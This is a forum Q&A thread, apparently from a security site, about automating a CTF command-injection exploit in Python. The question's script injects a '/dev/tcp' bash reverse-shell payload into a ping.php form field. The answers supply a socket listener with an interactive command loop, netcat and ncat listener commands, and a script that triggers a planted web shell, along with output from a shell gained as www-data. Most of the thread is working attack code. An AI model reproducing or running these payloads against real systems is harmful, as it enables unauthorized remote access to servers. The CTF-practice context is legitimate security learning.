Create netcat listener and execute reverse shell in the same script

Question

I'm coding an exploit in python that exploits a command injection vulnerability for a CTF and I'm wondering how could I start a netcat listener and then send the payload to the remote host and once the connection is stablished the script execution finishes and drops me to the stablished connection.

This is my code:

url= "http://vuln_url:8080/ping.php"

IP_ADDRESS = 'local_ip'
PORT = '9999'

cmd = ';bash -i >& /dev/tcp/%s/%s 0>&1' % (IP_ADDRESS, PORT)

values = {
            'ip': cmd,
            'submit':'submit'
          }

data = urllib.urlencode(values)
req = urllib2.Request(url, data)
urllib2.urlopen(req)

What I want to do is something like this:

url= "http://vuln_url:8080/ping.php"

IP_ADDRESS = 'local_ip'
PORT = '9999'

cmd = ';bash -i >& /dev/tcp/%s/%s 0>&1' % (IP_ADDRESS, PORT)

values = {
            'ip': cmd,
            'submit':'submit'
          }

#Some code to start the nc listener ¿(os.system("nc -l -p 9999 -vvv")?

data = urllib.urlencode(values)
req = urllib2.Request(url, data)
#Execute the request and start the reverse shell
urllib2.urlopen(req)

#Code to drop me to the nc stablished connection

I'm not sure if such a thing is even possible. Any idea?

Answer 1

Typically, you would just start the listener separately: Open a new terminal and run your nc -l -p 9999. Leave that there waiting, then fire off your exploit causing the remote machine to start a reverse shell.

There are loads of things that can go wrong in this process, generally just binding a shell is much easier than getting a reverse shell to work when you're blind.

---

You need to open a listening socket, and then interact with it once it has received a connection.

So, first open your listening socket (this replaces netcat)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 9999))
s.listen(5)

You can use a simple interact function that takes a socket:

def interact(sock):
     command=''
     while(command != 'exit'):
         command=raw_input('$ ')
         sock.send(command + '\n')
         time.sleep(.5)
         print sock.recv(0x10000)
     return

Then you can use them together with something like:

interact(s.accept())

This might require some tweaking, but that is the basic layout.

Answer 2

In your Kali machine you could push the netcat listener into the background by issuing:

nc -lvp [port] & (Don't use the brackets in your command)

You cursor may be on a new blank line, but no worries, just hit enter and it will bring you back to where you can issue another command. Feel free to look at the job in the background by using:

jobs

You will see any jobs listed out with a number, status, followed by the job. You can kill any jobs by issuing:

kill %1

The 1 being the job you wish to kill. Anyway, the nc listener will be in the background and you can execute your python exploit script which if successful, should bring up your shell/connection.

Answer 3

Actually, I was looking for the same to create ncat listener and execute reverse shell by visiting the page in the same python script.

I came up with the following solution.

from threading import Timer
import os

def interactive_shell(port):
    print "(+) listening to reverse shell"
    # wait for 1 sec before visiting webshell
    t = Timer(1, activate_webshell)
    # start thread activity
    t.start()
    ncat = 'ncat -lnvp %s' % port
    os.system(ncat)

def activate_webshell():
    target ="http://%s/rev_shell.php" % sys.argv[1]
    session.get(target)

output:

(+) listening to the shell
Ncat: Version 7.80SVN ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:40871.
bash: cannot set terminal process group (621): Inappropriate ioctl for device
bash: no job control in this shell
www-data@atutor:/var/www/html/webapp/mods$ whoami
whoami
www-data
www-data@atutor:/var/www/html/webapp/mods$